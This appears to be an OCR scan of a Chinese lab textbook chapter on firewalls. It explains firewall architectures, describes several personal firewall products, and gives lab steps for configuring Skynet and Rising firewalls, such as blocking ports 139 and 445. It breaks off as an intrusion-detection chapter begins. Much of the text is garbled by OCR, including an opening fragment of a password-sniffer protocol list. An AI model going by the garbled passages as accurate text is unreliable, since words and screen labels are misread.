s$ SMB (0) 

Telnet (0) 

VNC (0) 

5 TDS (0) 

B INS (0) 

£a SMTP (0) 

$ NNTP (OD 
DCE/RPC (0) 
UË) MSKerb5-PreAuth | 
4 Radius-Keys (0) 
€. Radius-Users (0) 
100.0) 

GB IKE-PSK (0) 

T Mysat 0) 
SNMP (0) 
SPO) 

< GRE/PPP (0) 
< PPPOE (0) 

AY SAP Diag (0) 


<> EP 
Hosts APR [e Rout 
Lost packets: 09» 
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第 5 童 防火墙 实验 


5.1 防火 墙 技术 


防火 墙 是 一 类 防范 措施 的 总 称 。 所 谓 “ 防 火 墙 ”, 是 指 一 种 将 内 联网 和 公众 访问 网 (外 联 
网 ,Internet) 分 开 的 方法 , 它 使 得 内 联网 与 外 联网 互相 隔离 ,限制 网 络 互 访 来 保护 内 部 网 络 。 
它 是 一 个 或 一 组 由 软件 和 硬件 构成 的 系统 ,在 两 个 网 络 通信 时 执行 的 一 种 访问 控制 规则 , 防 
止 重 要 信息 被 更 改 、 复 制 . 毁 坏 。 设 置 防火 墙 的 目的 都 是 为 了 在 内 部 网 与 外 部 网 之 间 设 立 唯 
一 的 通道 ,简化 网 络 的 安全 管理 。 


5.1.1 基本 概念 


防火 墙 是 一 个 网 络 安全 专用 词 , 它 是 在 内 部 网 (或 局 域 网 ) 和 互联 网 之 间 ,或 者 是 在 内 部 
网 的 各 部 分 之 间 实 施 安全 防护 的 系统 ,通常 由 硬件 设备 (路 由 器 网关、 堡垒 主机 、 代 理 服务 
器 ) 和 防护 软件 等 组 成 。 在 网 络 中 , 它 可 对 信息 进行 分 析 、 隔 离 . 限 制 ,从 而 保护 网 络 运行 
安全 。 

防火 墙 的 体系 结构 主要 包括 如 下 4 个 部 分 。 

CD 屏蔽 路 由 器 (screening router). 

它 是 防火 墙 最 基本 的 构件 ,可 以 由 路 由 器 实现 ,也 可 以 用 主机 实现 。 屏 项 路 由 器 作为 内 
外 连接 的 唯一 通道 ,要 求 所 有 报 文 都 必须 在 此 通过 检查 。 

(2) 双 穴 主机 网 关 (dual homed gateway). 

这 种 配置 是 用 一 台 装 有 两 块 网 卡 的 堡垒 主机 作 防 火 墙 。 两 块 网 卡 各 自 与 受 保护 网 和 外 
部 网 相连 ,其 防火 墙 软件 可 以 转发 应 用 程序 ,提供 服务 等 。 

G) 被 屏蔽 主机 网 关 (screened host gateway). 

屏蔽 主机 网 关 易 于 实现 ,也 很 安全 ,应 用 广泛 。 网 关 的 基本 控制 策略 由 安装 在 上 面 的 软 
件 决定 。 

(4) 被 屏蔽 子 网 (screened subnet) 。 

这 种 方法 是 在 内 部 网 络 和 外 部 网 络 之 间 建 立 一 个 被 隔离 的 子 网 ,用 两 台 分 组 过 滤 路 由 
器 将 这 一 子 网 分 别 与 内 部 网 络 和 外 部 网 络 分 开 。 

防火 墙 的 作用 包括 

(1) 取消 或 拒绝 任何 未 被 明确 允许 的 软件 包 通 过 。 

(2) 将 外 部 用 户 保 持 在 内 部 网 之 外 ,对 外 部 用 户 访问 内 部 网 进行 限制 。 

(3) 强制 执行 注册 、 审 计 和 报警 等 。 


5.1.2 个 人 防火 墙 
个 人 防火 墙 包括 天 网 防火 墙 . 诺 顿 防火 墙 ` 江 民 防 火 墙 金山 网 镖 和 瑞星 防火 墙 。 
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1. 天 网 防火 墙 

天 网 防火 墙 是 由 天 网 安全 实验 室 研发 制作 给 个 人 计算 机 使 用 的 网 络 安全 工具 。 它 根据 
系统 管理 者 设 定 的 安全 规则 (security rules) 防 护 网 络 , 提 供 强大 的 访问 控制 ,应 用 选 通 \ 信 
息 过 滤 等 功能 。 能 够 抵挡 网 络 入侵 和 攻击 ,防止 信息 泄露 ,保障 用 户 机 器 的 网 络 安全 。 天 网 
防火 墙 把 网 络 分 为 本 地 网 和 互联 网 ,可 以 针对 来 自 不 同 网 络 的 信息 ,设置 不 同 的 安全 方案 。 

天 网 防火 墙 具 有 如 下 特征 。 

CD 严密 的 实时 监控 : 防火 墙 会 监控 来 自 外 部 的 安全 威胁 ,过 滤 掉 所 有 未 授权 的 连接 ， 
时 刻 保 护 系统 安全 。 

(2) 灵活 的 安全 规则 : 通过 防火 墙 的 规则 设置 面板 ,可 以 方便 地 对 防火 墙 规则 进行 增 
加 、 删 除 和 修改 ,可 以 根据 自身 需要 制定 相应 的 规则 ,官方 会 根据 网 络 安全 环境 不 定时 升级 
最 新 规则 库 。 

(3) 便利 的 应 用 程序 规则 设置 : 拒绝 任何 未 经 授权 的 内 部 程序 连接 网 络 , 从 而 阻 断 所 
有 病毒 木马 泄露 秘密 信息 。 

(4) 详细 的 访问 记录 和 完善 的 报警 系统 : 遇 到 安全 威胁 即 发 出 报警 ,并 记录 下 攻击 来 
源 及 其 攻击 类 型 等 信息 ,在 第 一 时 间 掌 握 系统 的 安全 情况 。 

(5) 独创 的 扩展 安全 级 别 : 无 需 对 防火 墙 进 行 烦琐 设置 ,只 把 安全 级 别 调 成 “扩展 ?级 
别 即 可 ,每 当 有 最 新 规则 ,防火 墙 就 会 自动 联网 升级 。 

(6) 完善 的 密码 保护 措施 : 查看 、 人 和 修改, 关闭 防火 墙 , 均 需要 提供 密码 ,防止 了 病毒 或 黑 
客 恶 意 关 闭 防 火 墙 ,以 制造 安全 漏洞 。 

CT) 稳定 的 进程 保护 : 进程 保护 可 以 使 防火 墙 的 进程 享受 超越 系统 级 的 安全 待遇 , 保 
护 防火 墙 的 进程 不 被 恶意 关闭 。 

(8) 智能 的 人 侵 检测 : 针对 密集 的 攻击 ,天 网 防火 墙 会 自动 判断 并 将 攻击 源 加 入 列表 ， 
静默 该 攻击 源 。 一 旦 攻击 源 被 加 入 静默 列表 ,所 有 来 自 这 里 的 攻击 一 律 被 屏蔽 。 

2. 诺顿 防火 墙 

诺顿 防火 墙 是 由 赛 门 铁 克 提供 的 一 款 功 能 强大 的 防火 墙 。 诺 顿 防火 墙 集成 的 功能 相当 
丰富 ,除了 作为 基础 的 防火 墙 功 能 ,入 侵 检 测 .隐私 保护 等 功能 也 颇 为 强大 。 诺 顿 在 浏览 器 
中 集成 增加 了 Web 辅助 功能 插件 ,该 插件 可 以 动态 地 根据 浏览 网 站 的 情况 弹出 广告 窗口 、 
Applet, ActiveX 等 内 容 的 阻塞 ,而 用 户 可 以 针对 单个 网 站 决定 是 否 阻塞 这 些 内 容 , 同 时 以 
关键 字 的 形式 维护 广告 信息 过 滤 清 单 。 另 外 ,该 插件 还 可 以 帮助 用 户 禁 止 浏 览 器 信息 .访问 
历史 信息 等 泄露 给 外 部 网 络 。 诺 顿 防火 墙 集 成 的 入 侵 检 测 组 件 带 有 大 量 的 攻击 指纹 ,能 够 
设 定 在 多 长 时 间 内 阻止 发 起 攻击 的 计算 机 ,其 功能 性 已 经 趋 进 专 业 的 入 侵 检测 系统 。 

诺顿 的 定制 能 力 不 单 体现 在 对 防火 墙 规则 的 设 定 上 ,辅助 功能 组 件 的 管理 功能 也 相当 
强大 。 以 人 侵 检测 指纹 为 例 , 用 户 可 以 决定 哪些 攻击 需要 被 检测 ,哪些 攻击 需要 被 忽略 ; 同 
时 ,可 以 选择 发 现 攻击 时 的 告警 方式 。 另 外 ,不 只 防火 墙 具 有 防护 等 级 ,包括 隐私 保护 等 畏 
助 功 能 在 内 :也 可 以 独立 设置 级 别 ,用户 可 以 快速 简便 地 设 定 计算 机 的 防护 强度 。 

在 整体 设计 上 ,诺顿 相当 规整 ,大量 的 功能 很 好 地 排 布 在 几 个 选项 中 ,相应 的 许多 操作 
需要 深入 多 个 界面 才能 完成 ,这 也 是 诺顿 操作 负担 较 重 的 主要 原因 。 诺 顿 为 用 户 提供 了 多 
种 应 用 情境 模式 的 选择 ,对 这 些 模式 ,诺顿 分 别 赋予 了 不 同 的 规则 权限 ,初级 用 户 可 以 安全 
高 效 地 利用 模式 的 切换 调整 对 计算 机 的 保护 。 而 相对 专业 的 基于 地 址 和 协议 的 过 滤 条 件 设 
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定 被 隐藏 在 高 级 设置 部 分 ,专业 用 户 在 需要 的 情况 下 可 以 通过 该 界面 定义 更 加 复杂 的 防护 
策略 。 

3. 江 民 防火 墙 

江 民 防火 墙 是 一 款 专 为 解决 个 人 用 户 上 网 安全 而 设计 的 免费 网 络 安全 防护 工具 ,该 产 
品 融入 了 先进 的 网 络 访问 动态 监控 技术 ,彻底 解决 黑客 攻击 、 木 马 程序 及 互联 网 病毒 等 各 种 
网 络 危险 的 入侵, 全 面 保 护 个 人 上 网 安全 。 

江 民 防火 墙 具 有 如 下 特征 。 

d) 全 新 网 络 访问 动态 监控 技术 : 动态 监控 黑客 攻击 .木马 程序 .互联 网 病毒 等 危险 ， 
保护 上 网 账号 .QQ 密码 ,游戏 分 值 .银行 账号 、 邮 件 密码 、 个 人 隐私 等 重要 信息 不 外 汇 。 

(2) 网 络 安全 级 别 设 定 ,智能 防 黑客 、 拦 木马 : 高 .中 、 低 、 自 定义 4 种 安全 级 别 的 设 定 满 
足 不 同 需 求 用户 的 网 络 安全 选择 ;监视 网 络 数据 流 , 一 旦 遇 危 险 , 就 报警 提示 。 

(3) 程序 访问 控制 技术 ,网 络 日 志 记 录 技 术 : 用 户 可 对 本 地 网 络 规 则 进行 匹配 设置 , 保 
证 只 有 安全 可 靠 的 访问 才 被 允许 ;详细 记录 网 络 链接 情况 , 留 下 非法 访问 和 未 被 授权 访问 对 
象 详细 的 IP 地 址 。 

(4) 网 络 访问 控制 ,过 滤 不 良 网 站 ,保证 数据 安全 : 通过 设置 防火 墙 管理 中 的 区 域 访问 
控制 规则 ,可 以 阻止 不 良 网 站 和 受 控制 网 段 访问 计算 机 ,清洁 网 络 空 间 , 保 证 数据 安全 。 

4. 金山 网 镖 

金山 网 镖 是 一 款 由 金山 毒霸 推出 ,为 个 人 计算 机 量 身 定 做 的 网 络 安全 产品 。 它 根据 个 
人 上 网 的 不 同 需要 设 定 安全 级 别 , 有 效 地 提供 网 络 流量 监控 ,应 用 程序 访问 网 络 权限 控制 ， 
病毒 预警 ,黑客 ,木马 攻击 监测 。 

金山 网 镖 具 有 如 下 特征 。 

CD 全 面 安全 防护 : 专业 的 个 人 网 络 防火 墙 , 提 供 对 黑客 程序 .木马 和 间谍 软件 以 及 其 
他 恶意 程序 的 拦截 查 杀 ,对 网 络 进行 全 方位 攻击 防护 ,并 且 还 提供 了 网 络 访问 监控 ,共享 目 
录 管 理 , 不 良 网 站 过 滤 等 多 种 网 络 安全 实用 功能 。 

(2) 防 网 络 钓鱼 : 防止 钓鱼 网 站 、 钓 鱼 邮件 的 攻击 ,用户 访 问 钓 鱼网 站 时 ,网 镖 会 自动 
拦截 ,防止 用 户 的 账号 .密码 等 重要 信息 被 盗 。 

(3) 历史 痕迹 清理 : 帮助 用 户 预 览 并 清理 软件 使 用 的 痕迹 ,避免 重要 文件 .信息 或 个 人 
VR BAU SE 。 

OD 木马 防火 墙 : 通过 多 种 技术 ,实现 对 木马 进程 的 查 杀 。 系 统 中 一 旦 有 木马 .黑客 或 
间谍 程序 访问 网 络 , 会 及 时 拦截 该 程序 对 外 的 通信 访问 ,然后 对 内 存 中 的 进程 进行 自动 查 
杀 , 保 护 用 户 网 络 通信 的 安全 。 这 对 防御 盗 取 用 户 信息 的 木马 .黑客 程序 特别 有 效 。 

具体 体现 在 以 下 3 个 方面 。 

CD 能 够 设置 应 用 程序 的 访问 权限 。 

O 通过 高 .中 、 低 3 种 安全 级 别 的 设 定 , 达 到 不 同 程度 地 保护 用 户 安 全 的 目的 。 

© 能 够 阻止 如 冰河 .B10、 网 络 神偷 等 常见 木马 对 用 户 的 危害 ;车 有 木马 侵入 ,金山 网 
镖 会 及 时 拦截 ,并 弹出 对 话 框 告知 用 户 已 成 功 拦截 ,真正 达到 实时 保护 计算 机 的 目的 。 

(5) 智能 防 黑 技术 融 杀 毒 技 术 与 网 络 防火 墙 技术 于 一 体 , 直 接 查 杀 流 行 木马 与 黑客 程 
序 。 动 态 监视 计算 机 的 Internet 活动 状态 ,随时 加 以 控制 。 高 级 用 户 可 以 完全 细致 地 定制 
不 同 的 IP 包 过 滤 规 则 。 
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(6) 在 程序 应 用 规则 中 可 以 根据 自己 的 需要 设置 各 程序 访问 互联 网 和 局 域 网 的 权限 。 
一 般 来 说 ,很 多 程序 可 以 设置 成 禁止 访问 网 络 来 降低 受 攻击 的 可 能 性 。 

5. 瑞星 防火 墙 

瑞星 防火 墙 最 新 版 采用 增强 型 指纹 技术 ,有 效 地 监控 网 络 连接 。 内 置 细 化 的 规则 设置 ， 
使 网 络 保护 更 加 智能 。 游 戏 防盗 .应 用 程序 保护 等 高 级 功能 ,为 个 人 计算 机 提供 全 面 安全 的 
保护 。 通 过 过 滤 不 安全 的 网 络 访问 服务 , 极 大 地 提高 了 用 户 计算 机 的 上 网 安全 。 彻 底 阻 挡 
黑客 攻击 、 木 马 程序 等 网 络 危 险 , 保 护 上 网 账号 .QQ 密码 、 网 游 账号 等 信息 不 被 窃取 。 

COD 防火 墙 多 账户 管理 : 防火 墙 提供 “管理 员 ” 和 “普通 用 户 ” 两 种 帐户。 防火墙 提供 切 
换 账 户 功能 ,可 以 在 两 种 账户 之 间 进 行 切换 。 管 理 员 可 以 执行 防火 墙 的 所 有 功能 ,普通 用 户 
不 能 修改 任何 设置 .规则 ,不 能 启动 /停止 防火 墙 ,不 能 退出 防火 墙 。 

(2) 未 知 木马 扫描 技术 : 通过 启发 式 查 毒 技术 , 当 有 程序 进行 网 络 活动 的 时 候 ,对 该 进 
程 调用 未 知 木马 扫描 程序 进行 扫描 ,如 果 该 进程 为 可 疑 的 木马 病毒 , 则 提示 用 户 。 此 技术 提 
高 了 对 可 疑 程序 自动 识别 的 能 力 。 

G) IE 功能 调用 拦截 : 由 于 IE 提供 了 公开 的 Com 组 件 调 用 接口 ,因此 有 可 能 被 恶意 
程序 所 调用 。 此 功能 是 对 需要 调用 IE 接口 的 程序 进行 检查 。 如 果 检 查 为 恶意 程序 , 则 报警 
给 用 户 。 

(4) 反 钓 鱼 , 防 木马 病毒 网 站 : 提供 强大 的 、 可 以 升级 的 黑 名 单 规则 库 。 库 中 是 非法 
的 、 高 风险 、 高 危害 的 网 站 地 址 列表 ,符合 该 库 的 访问 会 被 禁止 。 

(5) 模块 检查 : 防火 墙 能 够 控制 是 否 允 许 某 个 模块 访问 网 络 。 当 应 用 程序 访问 网 络 
时 ,对 参与 访问 的 模块 进行 检查 ,根据 模块 的 访问 规则 决定 是 否 允许 该 访问 。 以 往 的 防火 墙 
只 是 对 应 用 程序 进行 检查 ,没有 对 所 关联 的 DLL 做 检查 。 进 行 模块 检查 ,可 以 防止 木马 模 
块 注入 正常 进程 中 访问 网 络 。 


5.2 AW pi X oi Scd 


实验 器 材 


天 网 防火 墙 个 人 版 软件 系统 ,1 套 。 
PCCWindows XP/Windows 7),1 台 。 


预习 要 求 


(1) 做 好 实验 预习 ,复习 防火 墙 技术 的 有 关内 容 。 
(2) 复习 天 网 防火 墙 的 使 用 方法 。 

(3) 熟悉 实验 过 程 和 基本 操作 流程 。 

(4) 做 好 预习 报告 。 


实验 任务 


通过 本 实验 ,掌握 以 下 技能 。 
D 学 会 天 网 防火 墙 的 安装 及 基本 配置 。 
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(2) 学 会 利用 天 网 防火 墙 保护 系统 安全 。 

实验 环境 

装 有 Windows XP/Windows 7 操作 系统 的 PC。 

预备 知识 

(1) 防火 墙 技术 及 原理 。 

(2) 网 络 协议 。 

实验 步 双 

1. 系统 设置 

如 图 5.2. 1 所 示 ,系统 设置 有 启动 .规则 设 定 、 应 用 程序 权限 、 局 域 网 地 址 设 定 、 其 他 设 
置 几 个 方面 。 


基本 设置 | 管理 权限 设置 | 在 线 升级 设置 | 日志 管理 | CAI 
p 规则 设 定 


IV 开机 后 自动 启动 防火 墙 E) 


应 用 程序 权限 
T- 允许 所 有 的 应 用 程序 访问 网 络 , 并 在 规则 中 记录 这 些 程序 


局 域 网 地 址 设 定 


局 城 网 地 址 [10 246.21 23 清空 


其 他 设置 


| FREE E Fogan Fiese (=z) 


图 521 天 网 防火 墙 设置 界面 


启动 项 是 设 定 开机 后 自动 启动 防火 墙 。 启 动 项 在 默认 情况 下 不 启动 ,一 般 选择 自动 启动 。 
这 也 是 安装 防火 墙 的 目的 。 规 则 设 定 是 一 个 设置 向 导 , 可 以 分 别 设置 安全 级 别 、 局 域 网 信息 、 
常用 应 用 程序 。 局 域 网 地 址 设 定 和 其 他 设置 ,用 户 可 以 根据 网 络 环境 和 爱好 自由 设置 。 
2. 安全 级 别 设置 
最 新 版 的 天 网 防火 墙 的 安全 级 别 分 为 高 、 中 、 低 、 自 定义 4 类 。 把 鼠标 置 于 某 个 级 别 上 
时 ,可 从 注释 对 话 框 中 查看 详细 说 明 ,如 图 5.2.2 所 示 。 
。 低 安全 级 别 情况 下 ,完全 信任 局 域 网 ,允许 局 域 网 中 的 机 器 访问 自己 提供 的 各 种 服 
务 , 但 禁止 互联 网 上 的 机 器 访问 这 些 服务 。 
o 中 安全 级 别 下 ,局域网 中 的 机 器 只 可 以 访问 共享 服务 ,不 允许 访问 其 他 服务 ,也 不 多 
许 互联 网 中 的 机 器 访问 这 些 服 务 ,同时 运行 动态 规则 管理 。 
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图 522 安全 级 别 设置 界面 


。 高 安全 级 别 下 ,系统 屏蔽 掉 所 有 向 外 的 端口 ,局 域 网 和 互联 网 中 的 机 器 都 不 能 访问 
自己 提供 的 网 络 共享 服务 ,网络 中 的 任何 机 器 都 不 能 查找 到 该 机 器 。 

。 自 定 义 级 别 适合 了 解 TCP/IP 的 用 户 , 可 以 设置 TP 规则 ,如 果 规 则 设置 得 不 正确 ， 
可 能 会 导致 不 能 访问 网 络 。 

对 普通 个 人 用 户 ,一 般 推荐 将 安全 级 别 设置 为 中 级 。 

3. 应 用 程序 访问 网 络 权限 设置 

在 设置 的 高 级 选项 中 ,可 以 设置 该 应 用 程序 是 通过 TCP, 还 是 UDP 访问 网 络 , 及 TCP 

可 以 访问 的 端口 ,如 图 5. 2. 3 所 示 。 当 不 符合 条 件 时 ,程序 将 询问 用 户 或 禁止 操作 。 
应 用 程序 访问 网 络 权 限 设置 四 O B 3 


PFWLiveUpdate. EXE 版 本 :2.7.5.1 Y a 
E BBB :C VProgam t 
Files\SkyNet\FireWall PFWLiveUndate EXE be 


jaa 版 本 :05.0. 103 Y 
| 路径 :C:\Program Files\Tencent\qq\Q0..exe x 


[pe [Services and Controller app — 版 本 :51.2600.2 
[PRIE : C windows Voyotem32 services. exe. 4 


| BRAE : C\windows\system32\spooksy.exe 


TDUpdate-exe REE) g 
[884% = C:\Program Files\Thunder : 
Network\ThunderMini\T DUpdate exe. 其 


Q : 
& Spooler SubSystem App 版 本 : 5.1.2600.2 
Q 


CDE 


图 523 应 用 程序 网 络 访问 权限 设置 


4. BEM IP 规则 设置 
选中 中 级 安全 级 别 时 ,进行 自 定义 IP 规则 的 设置 是 很 必要 的 。 在 这 一 项 设置 中 ,自行 
添加 编辑 删除 IP 规则 ,对 防御 入 侵 可 以 起 到 很 好 的 效果 ,如 图 5. 2.4 所 示 。 


BXXIPAM — (Q0 X b saD 

| 动作 | 和 名称 协议 | 方向 | 对 方 TP 
加 区 许 自己 用 ping 命 令 探测 其 他 机 器 ICIP d 任何 

© 区 许 路 由 器 返回 "超时 "的 ICIF 回 应 tICIP à 任何 

外。 区 许 路 由 器 返回 "无 法 到 达 " 的 ICIPRICIP à EA 

加 “| 区 许 局 域 网 的 机 器 用 ping 命 令 探 测 |ICHP 
© 防止 别人 用 ping 命 令 探测 ICMP 
© 防御 ICIP 攻 击 ICIP 
四 “防御 iae 攻击 ig 
© tcp 数据 包 监 视 TCP 
加 “| 区 许 局 域 网 内 的 机 器 进行 连 棕 和 传 盾 TCP 
(9 ”区 许 局 域 网 的 机 器 使 用 我 的 共享 资源 TCP 
s FILER EMSAM IS TCP 


Ee Ee Ee 5 Ev Ew Eo [e 
R 
E! 


S/S 007990) 


rp 如 果 那 台 机 器 安装 了 TCP/IP 协 1 e 
区 许 这 种 ICIP 包 退回 和 到 你 的 机 器 ， Teka 
ine semi. 


图 524 IP 访 问 规则 设置 
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对 IP 规则 不 其 精通, 并且 也 不 想 了 解 这 方面 内 容 的 用 户 , 可 以 通过 下 载 天 网 或 其 他 网 
友 提 供 的 安全 规则 库 将 其 导入 程序 中 ,也 可 以 起 到 一 定 的 防御 木马 程序 抵御 入 侵 的 效果 ， 
缺点 是 ,对 于 最 新 的 木马 和 攻击 方法 ,需要 重新 进行 规则 库 的 下 载 。 

IP 规则 的 设置 分 为 规则 名 称 的 设 定 、 规 则 的 说 明 数据 包 方向 、 对 方 IP 地 址 、 对 于 该 规 
则 IP、TCP、UDP、ICMP、IGMP 需要 做 出 的 设置 , 当 满 足 上 述 条 件 时 ,对 数据 包 的 处 理 方 
式 , 对 数据 包 是 否 进行 记录 等 。 如 果 IP 规则 设置 不 当 , 天 网 防火 墙 的 警告 标志 就 会 不 停 地 
闪 。 正 确 地 设置 了 IP 规则 , 既 可 以 起 到 保护 计算 机 安全 的 作用 ,又 可 以 不 必 时 时 关注 警告 
信息 。 

用 Ping 命令 探测 计算 机 是 否 在 线 是 黑客 经 常 使 用 的 方式 ,因此 要 防止 别人 用 Ping 
探测 。 

在 国内 IP 地 址 缺乏 的 情况 下 ,很 多 用 户 在 一 个 局 域 网 下 上 网 。 在 同一 个 局 域 网 内 可 能 
存在 很 多 想 一 试 身手 的 黑客 。 

139 端口 是 经 常 被 黑客 利用 Windows 系统 的 IPC 漏洞 进行 攻击 的 端口 ,用 户 可 以 对 通 
过 这 个 端口 传输 的 数据 进行 监听 或 拦截 ,规则 是 名 称 可 定 为 139 端口 监听 ,外 来 地 址 设 为 任 
何 地 址 ,在 TCP 的 本 地 端口 可 填写 139 ,通行 方式 可 以 是 通行 并 记录 ,也 可 以 是 拦截 ,这 样 
就 可 以 对 这 个 端口 的 TCP 数据 进行 操作 了 。445 端口 的 数据 操作 类 似 。 

如 果 用 户 知道 某 个 木马 或 病毒 的 工作 端口 ,就 可 以 通过 设置 IP 规则 封闭 这 个 端口 。 方 
法 是 增加 IP 规则 ,在 TCP 或 UDP 中 将 本 地 端口 设 为 从 该 端口 到 该 端口 ,对 符合 该 规则 的 
数据 进行 拦截 ,就 可 以 起 到 防范 该 木马 的 效果 。 

增加 木马 工作 端口 的 数据 拦截 规则 ,是 TP 规则 设置 中 最 重要 的 一 项 技术 。 


实验 报告 要 求 


。 写 明 实验 目的 。 

。 附 上 实验 过 程 的 截图 和 结果 截图 。 
* BB A TE E A Va] A e RED Jr E o 
. 闸 述 收获 与 体会 。 


5.3 瑞星 防火 墙 实验 


实验 器 材 


瑞星 防火 墙 个 人 版 软件 系统 ,1 套 。 
PCCWindows XP/Windows 7),1 台 。 


预习 要 求 


(1) 做 好 实验 预习 ,复习 防火 墙 技术 的 有 关内 容 。 
(2) 复习 瑞星 防火 墙 的 使 用 方法 。 
(3) 熟悉 实验 过 程 和 基本 操作 流程 。 
(4) 做 好 预习 报告 。 
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实验 任务 


通过 本 实验 ,掌握 以 下 技能 。 
COD 学 会 瑞星 防火 墙 的 安装 及 基本 配置 。 
(2) 学 会 利用 瑞星 防火 墙 保护 系统 安全 。 


实验 环境 
装 有 Windows XP/Windows 7 操作 系统 的 PC. 
预备 知识 


CD. 防火 墙 技术 及 原理 。 
(2) 网 络 协议 。 


实验 步 又 


1. 启动 瑞星 个 人 防火 墙 软件 
采用 下 列 方 法 之 一 可 以 启动 瑞星 个 人 防火 墙 软件 。 瑞 星 个 人 防火 墙 窗口 如 图 5. 3. 1 所 示 。 


系统 状态 
itn 访问 规则 中 没有 规定 动作 的 程序 在 访问 网 络 时 ， 会 提示 用 户 。 


受 攻 击 信息 
系统 启动 以 来 ， 还 没有 发 现 对 系统 的 攻击 。 


Perin [2 更 多 信息 ] 
当前 活动 程序 O00000 g 
FARBER 个 的 系统 目前 存在 6 个 不 安全 设置 


"E "NN em 
发 送 K RATT PR: 
当前 版 本 : 19.22.20 更 新 日 期 : 2007-05-09 


RISING 瑞星 


图 531 瑞星 个 人 防火 墙 窗口 


COD 双击 桌面 上 的 “瑞星 个 人 防火 墙 ?快捷 图 标 即 可 启动 。 

(2) 单 击 “ 开 始 "按钮 ,选择 “程序 >“ 瑞星 个 人 防火 墙 ">“ 瑞 星 个 人 防火 墙 ” 命 令 即 可 
启动 。 

提示 : 一 般 情况 下 ,瑞星 个 人 防火 墙 在 系统 启动 时 自动 启动 。 

2. 设置 安全 级 别 

在 防火 墙 程序 窗口 的 右 下 角 拖 动 滑 块 移动 到 最 右 侧 , 即 可 设 定安 全 级 别 为 “高 级 ”。 提 
mai 关于 安全 级 别 的 定义 及 规则 如 下 。 
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… 普通 : 系统 在 信任 的 网 络 中 ,除非 规则 禁止 ,否则 全 部 放 过 。 

中 级 :系统 在 局 域 网 中 ,默认 允许 共享 ,但 是 禁止 一 些 较 危险 的 端口 。 

。 高 级 ， 系统 直接 连接 Internet, 除 非 规则 放行 ,否则 全 部 拦截 

3. 扫描 木马 病毒 

单 击 防火 墙 程序 窗口 上 的 “操作 "菜单 ,选择 “扫描 木马 病毒 "命令 ,将 在 屏幕 右 下 角 弹 出 
扫描 窗口 .扫描 结束 后 将 给 出 提示 , 单 击 提示 框 中 的 “详细 信息 ”按钮 可 以 查看 具体 的 扫 撒 结 
果 日 志 。 

4. 黑白 名 单 的 设置 

D 黑 名 单 的 设置 

黑 名单 用 于 设置 禁止 与 本 机 通信 的 计算 机 列表 ,例如 ,可 以 把 攻击 本 机 的 计算 机 加 入 此 
名 单 。 单 击 * 设 置 " 某 单 , 选 择 * 详 细 设置" 命令 , 打 
开 * 详 细 设置 "对 话 框 ; 单 击 * 规 则 设置 * 下 的 * 黑 名 
单 "; 单 击 * 增 加 规则 "按钮 ,弹出 一 个 如 图 5. 3.2 所 
示 的 “增加 黑 名 单 " 对 话 框 ;在 “地 址 类 型 "后 的 下 拉 
列表 框 中 选择 * 特 定 地 址 "或 * 地 址 范围 *; 在 * 输 入 
地 址 "后 的 文本 框 中 输入 被 禁止 与 本 机 通信 的 TP 
地 址 ; 单 击 * 保 存 "按钮 ,完成 设置 。 

D ARMAR 图 532 SAMA" 对话 杠 

白 名 单 用 于 设置 完全 信任 的 计算 机 列表 ,列表 
中 的 计算 机 对 本 机 有 完全 访问 权限 。 具 体操 作 参 看 黑 名 单 的 设置 。 

5, 修改 应 用 程序 访问 网 络 的 访问 规则 

CD 单 击 * 设 置 "菜单 ,选择 “详细 设置 "命令 ,打开 “详细 设置 "对 话 杠 。 

(2) 选择 “规则 设置 "下 的 * 访 问 规则 ”命令 ,打开 如 图 5. 3. 所 示 的 对 话 框 。 


图 533 访问 规则 设置 


= 157 * 


(3) 允许 或 禁止 应 用 程序 访问 网 络 。 

在 程序 列表 框 中 选择 一 个 应 用 程序 ,如 Telnet; 单 击 “ 编 辑 规则 ”按钮 ,弹出 如 图 5. 3. 4 
所 示 的 “编辑 访问 规则 ”对 话 框 ;在 “常规 模式 ”下 选择 “禁止 ”; 单 击 “ 保 存 ” 按 钮 , 即 可 禁止 
Telnet 程序 访问 网 络 。 


编辑 访问 规则 


Telnet 
程序 路 径 : c:\windows\systen22\tUntswr. exe 


公司 名 称 : Microsoft Corporation 


文件 版 本 : 5.1.2600.2180 Gxpsp_sp2_rtm. 040803-2158) 

MERI: | 系统 软件 可 

党 规模 式 : Ba Im] isan: (HET 
L1 BRE RIP 


EES err Noss (aes jor» | 
图 534 ”编辑 访问 规则 "对话 框 


实验 报告 要 求 

。 写 明 实 验 目 的 。 

。 附 上 实验 过 程 的 截图 和 结果 截图 。 
。 益 述 碰 到 的 问题 以 及 解决 方法 。 
tol SA. 


5.4 防火墙 评测 实验 


实验 器 材 


天 网 防火 墙 软件 系统 ,1 套 。 
瑞星 防火 墙 软件 系统 ,1 套 。 
江 民 防火 墙 软件 系统 ,1 套 。 
PCCWindows XP/Windows 7).1 台 。 


预习 要 求 


CD 做 好 实验 预习 ,复习 防火 墙 技术 的 有 关内 容 。 
D 复习 天 网 防火 墙 等 多 种 防火 墙 的 使 用 方法 。 
(3) 熟悉 实验 过 程 和 基本 操作 流程 。 
(4) 做 好 预习 报告 。 
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实验 任务 


通过 本 实验 ,掌握 以 下 技能 。 
COD 掌握 主流 防火 墙 的 性 能 。 
(2) 掌握 主流 防火 墙 的 功能 。 


实验 环境 

装 有 Windows XP/Windows 7 操作 系统 的 PC, 
预备 知识 

防火 墙 技术 及 原理 。 

实验 步 又 


(1) 完整 记录 天 网 防火 墙 \ 瑞 星 防 火 墙 控制 的 实验 内 容 。 
(2) 选择 诺顿 ,金山 防火 墙 或 者 其 他 软件 防火 墙 进行 控制 实验 。 


(3) 确定 防火 墙 的 性 能 功能、 特定 功能 3 个 方面 作为 评测 分 析 报 告 的 主体 。 


(A) 撰写 并 完成 评测 分 析 报 告 。 
实验 报告 要 求 


。 写 明 实 验 目 的 。 

。 附 上 实验 过 程 的 截图 和 结果 截图 。 
。 闸 述 碰 到 的 问题 以 及 解决 方法 。 
。 阐述 收获 与 体会 。 
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第 6 音 入 侵 检 测 实 验 


随 着 技术 的 发 展 ,网 络 日 趋 复杂 , 正 是 由 于 传统 防火 墙 暴露 出 来 的 不 足 和 弱点 , 才 引 发 
人 们 对 入 侵 检测 系统 技术 的 研究 和 开发 。 网 络 人 侵 检测 系统 可 以 弥补 防火 墙 的 不 足 ,为 网 
络 安全 提供 实时 的 入侵 检测 及 采取 相应 的 防护 手段 。 入 侵 检 测 技术 是 近 20 年 来 出 现 的 一 
种 主动 保护 自己 免 受 黑 客 攻击 的 新 型 网 络 安全 技术 。 从 系统 运行 过 程 中 产生 的 或 系统 所 处 
